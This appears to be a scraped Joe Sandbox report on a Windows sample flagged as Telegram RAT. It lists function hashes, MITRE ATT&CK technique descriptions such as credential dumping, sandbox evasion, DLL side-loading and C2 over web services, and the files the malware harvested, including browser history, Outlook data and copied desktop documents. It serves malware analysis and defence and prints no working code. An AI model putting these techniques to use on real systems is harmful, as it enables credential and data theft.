Opcode Fuzzy Hash: 39561b83276433cce1db80d1bd27f4ac663e038ab27d50ceaa3fd9d0bad96e9b
Instruction Fuzzy Hash: 3742C675D002598FDB14CFA8C980BDDFBF2BB89305F2881A9D518A7246C7359E85CF64

Function 0132DC20 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612218319.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc51fa8259c1960a5a1650e67476fb3ae0d612819337eddddb7d31d3fa2c2db4
Instruction ID: 7c32c2f47a594d198f3c9ff069c06f645e1ba0da2b1eb408d599a9a6336bed46
Opcode Fuzzy Hash: dc51fa8259c1960a5a1650e67476fb3ae0d612819337eddddb7d31d3fa2c2db4
Instruction Fuzzy Hash: D9229974D00219CFCB14DFA9C581AAEFBB2BF48315F248669D455AB346C734AD82CFA4

Function 0132F698 Relevance: .4, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612218319.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddda572f88022c7ef2c4ed83bd60cdc8893fa288f7ffc97038c072df470b5a23
Instruction ID: b314de50e3a6abcdfb9c4356dfa44f14aebe72be30ff1cdc8044dc98e6dbb7af
Opcode Fuzzy Hash: ddda572f88022c7ef2c4ed83bd60cdc8893fa288f7ffc97038c072df470b5a23
Instruction Fuzzy Hash: 3812EF74D00229CFDB14DFA9C684AAEFBF6BF48315F248259D408AB256D735AD81CF90

Function 01334AF8 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612238820.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70fd7b5e6e2640dd2caaabfff2c6dbacffee2553d1bad33d903347713909b87f
Instruction ID: 132483c60398a6ce47544756681acc59620191de94e7c26e8b57549634788f13
Opcode Fuzzy Hash: 70fd7b5e6e2640dd2caaabfff2c6dbacffee2553d1bad33d903347713909b87f
Instruction Fuzzy Hash: F0C1F274D04258CFDB24CFA9C9847EEBBF2BF89309F1481AAD409A7251D7349A85CF64

Function 0596C448 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1618614493.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5960000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6302e2c044b14a3d008ff8b10dd1e4aaa3e2ebf44525c4145893974ed5ac71bb
Instruction ID: 25676e0e0a7d2a87102bb9d3d5c85ea23cd4c7aafe318e7a5e033c5a2e45ca24
Opcode Fuzzy Hash: 6302e2c044b14a3d008ff8b10dd1e4aaa3e2ebf44525c4145893974ed5ac71bb
Instruction Fuzzy Hash: BCD10535C1075ACACB11EBA5D950AE9B7B1FF95300F10CB9AE4097B251EF70AAC4CB91

Function 010187E0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611908505.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1010000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdd6c687d064c891f7717695cfb5ccd71ab9a7faf72c9c8f38fc55ccca917db3
Instruction ID: a46aaecf70efb0f7374093b2f9096fbde1eee1bd62e00b9ef2ebfd107cab86ac
Opcode Fuzzy Hash: fdd6c687d064c891f7717695cfb5ccd71ab9a7faf72c9c8f38fc55ccca917db3
Instruction Fuzzy Hash: 3ED1FF74D01228CFDB64CFA9D984B9DFBB2BF89300F1081AAD449A7259DB349E85CF50

Function 0596C458 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1618614493.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5960000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9560a2e5f0c18a8204bef173f1f7e24c14709fbaf32c8ca635163f231331829
Instruction ID: 6c16456868ba453a6b8f30e399534d0da12b31f3ab83e4c399d860232e9994fd
Opcode Fuzzy Hash: f9560a2e5f0c18a8204bef173f1f7e24c14709fbaf32c8ca635163f231331829
Instruction Fuzzy Hash: BFD1F535C1075ACACB11EBA5D9506E9B3B1FF95300F10CB9AE4097B255EF70AAC4CB91

Function 01330040 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612238820.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85fbd5271d15c6d1370e9e655ec3f1a65912937b8646e0ed548f4578a9671e3f
Instruction ID: 0ce352b0b609068cffb6fc69a9c8a864cf71a777b7cdc473d0ee08255822493d
Opcode Fuzzy Hash: 85fbd5271d15c6d1370e9e655ec3f1a65912937b8646e0ed548f4578a9671e3f
Instruction Fuzzy Hash: 90B1C170D00219CFDB18CFA9C584BEEFBF6BB88315F248169D418BB255D3789A85CB58

Function 013347C0 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612238820.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fdac124dffb50f065760265cc734cb21302b8618699e6cea4a6848414549167
Instruction ID: 6b90fd332f19e9cb3f94e2213fa4522bf9b2336a24fbe1ec0f46dd5f4f9e66b4
Opcode Fuzzy Hash: 9fdac124dffb50f065760265cc734cb21302b8618699e6cea4a6848414549167
Instruction Fuzzy Hash: 9CB1F171D002099FEF14CFE9CA84AAEBBB2FF88304F208029E514BA254DB355E55DF61

Function 013347B1 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612238820.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fc9fe7277394508e5e643ba5df72ce46ac7a4256e7886a6c614396a3e90af0d
Instruction ID: 26fbcbf5dbf8a8a6c8576813b4baac2c473ef2de1755345bfdca0305cb4b601f
Opcode Fuzzy Hash: 5fc9fe7277394508e5e643ba5df72ce46ac7a4256e7886a6c614396a3e90af0d
Instruction Fuzzy Hash: 13B1F271D002099FEF15DFE9CA44AAEBBB2FF88304F208029E514BA264DB355E55DF61

Function 01330640 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612238820.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5a49518361fd62699dbe12bd77a46447a89ca5cd36c1993e567e535e4ff52be
Instruction ID: c419f46c3d19ac443319eca3a37bf8aff52fac850c4a7b035d2f74d727ce1d3a
Opcode Fuzzy Hash: b5a49518361fd62699dbe12bd77a46447a89ca5cd36c1993e567e535e4ff52be
Instruction Fuzzy Hash: 35A11370D01219CFDB08CFA9C548BEEBBB2BF89315F249159E424B72A1C7785A85CF58

Function 0132DC10 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612218319.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f1748b5372d388a9dd2da6104e07f3fe3e04fac29203f5c5d8ab170a9cc803
Instruction ID: ac2c2af6b19809bf3ff1cfdc6bb094648fe4945229683fb71d3795bef2484e82
Opcode Fuzzy Hash: 62f1748b5372d388a9dd2da6104e07f3fe3e04fac29203f5c5d8ab170a9cc803
Instruction Fuzzy Hash: 85B1A274E00219CFDB14DFA9C584A9EFBF2BF48315F288269D458AB356D734A981CF90

Function 059603E8 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1618614493.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5960000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0edeb7c2f2b17bfd990a811531f2eb83581b9092c0e71d29d0330dc18f56c2b4
Instruction ID: 6c706cc4acd2e0ac1f94e7feb8a8cc6caf4634dad4a2e56c4b832171f79eaccd
Opcode Fuzzy Hash: 0edeb7c2f2b17bfd990a811531f2eb83581b9092c0e71d29d0330dc18f56c2b4
Instruction Fuzzy Hash: AF910474D04218CFDB14DFAAD984AADFBF2BF88300F20916AD419AB355DB349946CF50

Function 013309C8 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612238820.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0543895b0b826309b9178b60fa58ab5fcdd9ffbe99e82b00f56e86cdb1c36fb
Instruction ID: 7cd5e990f7a626507062c52cf0181ecd1616dabaa7f044c5ceaf266acd377915
Opcode Fuzzy Hash: d0543895b0b826309b9178b60fa58ab5fcdd9ffbe99e82b00f56e86cdb1c36fb
Instruction Fuzzy Hash: 5C810974D01219DFDB08DFA9C584AAEFBF2FF88315F248269E414A7255C7349E81CB98

Function 0101C458 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611908505.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1010000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea7201b189cb5501f0ffdccf2e0d39d08e6c0c16e9852528ae5e36c12d426036
Instruction ID: 1bcc760ced7c41cbe207ebbbde929b6f9b16f83cd720eee119cc19187ce76e34
Opcode Fuzzy Hash: ea7201b189cb5501f0ffdccf2e0d39d08e6c0c16e9852528ae5e36c12d426036
Instruction Fuzzy Hash: 8A81B274E00218CFDB54DFAAC990ADDBBF2BF89300F249169D449AB259DB349982CF54

Function 01320006 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612218319.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6de5bd58a53e911ee703aecd1af7da80b4e7ae98f88d2aa9914a5af5f825bb87
Instruction ID: 5b27c79b5e495d0f3b88f0654c1013ecc045950e8c59e55e4605ec7a667fa4e8
Opcode Fuzzy Hash: 6de5bd58a53e911ee703aecd1af7da80b4e7ae98f88d2aa9914a5af5f825bb87
Instruction Fuzzy Hash: 3761EA71D042688FEB19CF6AC8547DABFB1BF8A304F14C0EAD448A7261D7745A85CF50

Function 01332C04 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612238820.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb14ac232a78752f1e92c6bcb0326f51136391c2dbdd98206057b7c109335a5e
Instruction ID: 68e0bf8867fd386fc2fdb6daf066af1eca6244c9e0d9e7e9a14df9bcd71231d7
Opcode Fuzzy Hash: eb14ac232a78752f1e92c6bcb0326f51136391c2dbdd98206057b7c109335a5e
Instruction Fuzzy Hash: D55187B0D01269CFEB28CFA6C95979EBAB2BF84304F14C5AAC409BB254DB750985CF54

Function 01330006 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612238820.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3799417cdc4f001c7c99f114bd5c25f4f89c46fc8c3bf133d1859085cfd6d00b
Instruction ID: 44ff73646dad0488467dc09ae625792dad3f6c8ff54155f56e284b30ceaf9a31
Opcode Fuzzy Hash: 3799417cdc4f001c7c99f114bd5c25f4f89c46fc8c3bf133d1859085cfd6d00b
Instruction Fuzzy Hash: 86413870C053488FDB19CFAAC4547DEBFF2AF86314F1880AAD054AB2A1D7794949CB95

Function 010187D0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611908505.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1010000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 025d6455a634ca18c7f458a1e5b281c4138bae481f100c1f06259396f356a26c
Instruction ID: 8d02da77c67c776277e31763e4a7830901d75bca2de64c2f44ee2a2aac2a079e
Opcode Fuzzy Hash: 025d6455a634ca18c7f458a1e5b281c4138bae481f100c1f06259396f356a26c
Instruction Fuzzy Hash: 0A31E771D002188BEB28CFBAD9447DDBBF2BF88304F14C1AAD508AB255EB750A45CF54

Function 01330DD0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612238820.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73bfa0d0f57707a8f7434e0de724bcef3f8747c66388b3436b158da47ad4a6b5
Instruction ID: 87903485cc7b79a7c52f79bbf24fdbb85a0abd6ade3ecdee300474f0622fac4d
Opcode Fuzzy Hash: 73bfa0d0f57707a8f7434e0de724bcef3f8747c66388b3436b158da47ad4a6b5
Instruction Fuzzy Hash: AF212971A01229CFDB14CFA9C448BEEBBF4FB49314F15456AD514A7291D3789A48CBA0

Function 01335D58 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1612238820.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca48ab221790b3d4db698df5d0fea1eec98a669599fa5a12dccf871b43d163f0
Instruction ID: 4a30e2e12daa8f8e761a1175819e1ca02db769cc605cacb7b8ac5effedf16523
Opcode Fuzzy Hash: ca48ab221790b3d4db698df5d0fea1eec98a669599fa5a12dccf871b43d163f0
Instruction Fuzzy Hash: 5B014C309212189FDB04DFB4D808BEEBBB4FF8A314F105069D511BB260EB755845CBA8

Function 010119C0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611908505.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1010000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2481afb3375fcab9b3683efaf9551d9dce5b2df11e71fb262cc9c0df7a0e91c3
Instruction ID: 927c439092183438a4de577e8fb58cd9cd8156e1b457ad9cb0d55c7bfa0f4a42
Opcode Fuzzy Hash: 2481afb3375fcab9b3683efaf9551d9dce5b2df11e71fb262cc9c0df7a0e91c3
Instruction Fuzzy Hash: DE110FB1D17B429FE34DCF6BAD00102BAEBBBC5210709C17A8848CA339EF3404528B64

Function 010119D0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1611908505.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1010000_vEtDFkAZjO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 790cb42341bfcf4b7995991fa055383281d4ce4ef494257774f84db370a3315e
Instruction ID: 8b09d1675ae0dcbc76b4c890abe674b2a33027c6d5ef8e89338835d45d078a46
Opcode Fuzzy Hash: 790cb42341bfcf4b7995991fa055383281d4ce4ef494257774f84db370a3315e
Instruction Fuzzy Hash: 9B01B5B2D27B029FA34CCF6BBD40112BAEBBBC4240759C13A8918CA338EF3000518F64

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report vEtDFkAZjO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\138727\@[United States].zip (copy)

C:\Users\user\AppData\Local\138727\Browsers\Firefox\Bookmarks.txt

C:\Users\user\AppData\Local\138727\Browsers\Firefox\History.txt

C:\Users\user\AppData\Local\138727\Browsers\Outlook\Outlook.txt

C:\Users\user\AppData\Local\138727\DotNetZip-u1bugrxr.tmp

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\DVWHKMNFNN.jpg

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\DVWHKMNFNN.xlsx

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\HTAGVDFUIE.pdf

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\JSDNGYCOWY.png

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS.docx

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\KATAXZVCPS.xlsx

Windows Analysis Report
vEtDFkAZjO.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
